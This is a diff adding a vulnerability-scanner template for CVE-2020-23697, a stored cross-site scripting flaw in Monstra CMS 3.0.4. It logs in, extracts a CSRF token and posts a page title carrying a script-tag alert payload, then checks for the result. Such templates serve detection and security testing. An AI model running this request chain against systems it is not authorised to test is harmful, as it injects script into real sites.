diff --git a/cves/2020/CVE-2020-23697.yaml b/cves/2020/CVE-2020-23697.yaml new file mode 100644 index 0000000000..36c701cac4 --- /dev/null +++ b/cves/2020/CVE-2020-23697.yaml @@ -0,0 +1,62 @@ +id: CVE-2020-23697 + +info: + name: Monstra CMS V3.0.4 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Cross Site Scripting vulnerabilty in Monstra CMS 3.0.4 via the 'page' feature in admin/index.php. + reference: + - https://github.com/monstra-cms/monstra/issues/463 + - https://nvd.nist.gov/vuln/detail/CVE-2020-23697 + classification: + cve-id: CVE-2020-23697 + metadata: + verified: true + tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated + +variables: + string: "{{to_lower('{{randstr}}')}}" + +requests: + - raw: + - | + POST /admin/index.php?id=dashboard HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + login={{username}}&password={{password}}&login_submit=Log+In + + - | + GET /admin/index.php?id=pages&action=add_page HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + - | + POST /admin/index.php?id=pages&action=add_page HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15 + + - | + GET /{{string}} HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'contains(all_headers_4, "text/html")' + - 'status_code_4 == 200' + - 'contains(body_4, ">") && contains(body_4, "Monstra")' + condition: and + + extractors: + - type: regex + name: csrf + part: body + group: 1 + regex: + - 'id="csrf" name="csrf" value="(.*)">' + internal: true